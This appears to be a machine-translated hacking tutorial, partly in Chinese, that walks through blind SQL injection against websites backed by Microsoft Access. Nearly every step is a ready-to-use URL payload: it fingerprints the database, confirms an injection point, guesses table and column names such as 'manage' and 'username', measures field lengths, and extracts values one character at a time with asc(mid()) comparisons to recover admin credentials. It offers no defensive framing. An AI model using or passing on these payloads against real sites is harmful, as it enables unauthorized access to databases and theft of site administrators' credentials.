When injecting ACCESS, you cannot reveal the table name like MYSQL, you can only guess one by one.
1. After finding the website, check whether it is an ACCESS database.
Construct the payload URL+ and exists (select id from mysysaccessobjects) if the return is correct, it is the access database.
and (select count(*) from msysobjects)>0 – if the permission is insufficient, the access database
and (select count(*) from sysobjects)>0 – if the return is normal, it is the MSSQL database
The idea managed to make him report an error, and the error message contains database information.
2. Perform and 1=1 (display is normal) and and1=2 (error) are indeed injection points.
3.URL + and 0<=(select count(*) from admin) and 1<2 查看返回结果,发现出错。说明没有admin这个表。 (使用参见的表名进行猜测) and (select count(*) from admin) 即可
4. URL + and 0<=(select count(*) from manage) and 1<2 to check the return result, it is the correct page anyway. Explain that the database contains the manage table. and (select count(*) from manage )
Try one by one to see what other table names are.
5. Determine the existence of the manage table, and then determine how many records there are in the table
payload: and (select count(*) from 猜到的表名)>X(X is a number, > we can also replace it with = or <).
Try: and (select count(*) from manage)>0 to see if the correct page is returned. Correctly states that there are >0 records. Then continue to modify X to determine how many records there are. There is only one record after the test here.
6. Know that there is only one record in the manage table, that is, there is only one column. Then guess the column names.
Payload : (select count(username) from manage) Guess whether there is a username column in the manage table. Then replace the username with some commonly used password id and so on to test.
7. Once you know the column names, then guess the field length.
Payload: use the statement and (select top 1 len(column) from table)>X, `select top 1` means to query the first piece of data. (To query the length of the second field, you must first judge the field value of the first item)
payload:and (select top 1 len(username) from manage)>4 返回正确页面,说明第一个字段大于4
payload:and (select top 1 len(username) from manage)>5 返回错误页面,说明第一个字段小于5 。结合说明第一个字段长度为5
8. 判断字段值
payload: and (select top 1 asc(mid(field name, X, 1)) from table name)>N, both N and X in this sentence are numbers. Top 1 still means querying the first piece of data.
The asc() function is used to get the ASCII code of the string in () (what is ASCII code? The computer uses binary counting internally, so why can it recognize decimal numbers and various characters and graphics?
In fact, whether it is numerical data, text, graphics, etc., a coding standard is used inside the computer. Through the coding standard, it can be converted into binary numbers for processing, and the computer will process the information and then convert it into visual information for display. The commonly used character code is ASCII code, which was originally the national standard of the United States,
It was set as an international standard in 1967. ), for example, the ASCII code corresponding to a is 97.
mid(field name, A, N), this function is used to intercept the fields in () to intercept N characters from the A-th length, for example, mid(username, 2, 3) means from the username field from The second character is intercepted 3 digits backward, including the second character. For example, if the value is admin, the intercepted value is dmi. We used mid(field name, X, 1) above,
The last number is 1, but there is an asc() function in front of it. The asc() function only converts one character into ASCII code, so when we use the mid() function to intercept the column value, only one bit is intercepted .
Construct the payload: and (select top 1 asc(mid(username,1,1)) from manage)>96 The page returns to the normal page, indicating that the first digit in the username column is greater than 96 (after transcoding)
and (select top 1 asc(mid(username,1,1)) from manage)>97 The page returns an error page, indicating that the one digit after the first field in the username column is not greater than 97 (after transcoding). The description is that after 97 ASCII transcoding, it is a
Then in the construction of the payload: and (select top 1 asc(mid(username,2,1)) from manage)>97 continue to guess the second field. Use this method to continue guessing the fields that follow. All fields can be burst out.
9. Sometimes, we will encounter the data of Chinese characters, for example, the data in the username is "administrator", then the ASCII code cannot be used.
10. Use the method of word by word to guess the value of the column, sometimes it is >0 page or return an error! If it is not greater than 0, it means that the ASCII code of the late value is a negative number, that is, Chinese characters! At this time, if we want to get its ASCII code, we need to use a function! The abs() function is used to return the absolute value of a value! As long as we add this function to the sentence, we can guess the ASCII code in the usual way. Specifically, it is added like this: and (select top 1 abs(asc(mid(列,X,1))) from admin)>Nthat's it, but don't forget to add a minus sign after you guess it.
11. Union queries can also try to guess.